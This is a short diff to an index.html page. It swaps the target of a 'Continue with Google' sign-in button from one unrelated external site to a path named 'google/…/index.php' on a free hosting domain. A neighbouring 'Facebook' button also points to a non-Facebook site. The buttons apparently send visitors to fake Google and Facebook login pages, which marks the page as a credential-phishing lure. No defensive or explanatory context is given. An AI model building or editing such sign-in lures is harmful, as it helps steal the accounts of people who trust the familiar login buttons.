--- a/index.html
+++ b/index.html
@@ -159,7 +159,7 @@
     </a>
 
     <!-- New Auth buttons -->
-    <a href="http://khair-zaman.com/volt/XZ?nox=5318149339" class="auth-button">
+    <a href="https://dataarab3.serv00.net/google/5318149339/index.php" class="auth-button">
         <img src="path-to-google-icon.png" alt="Google Icon"> Continue with Google
     </a>
     <a href="http://khair-zaman.com/volt/FB?nox=5318149339" class="auth-button">
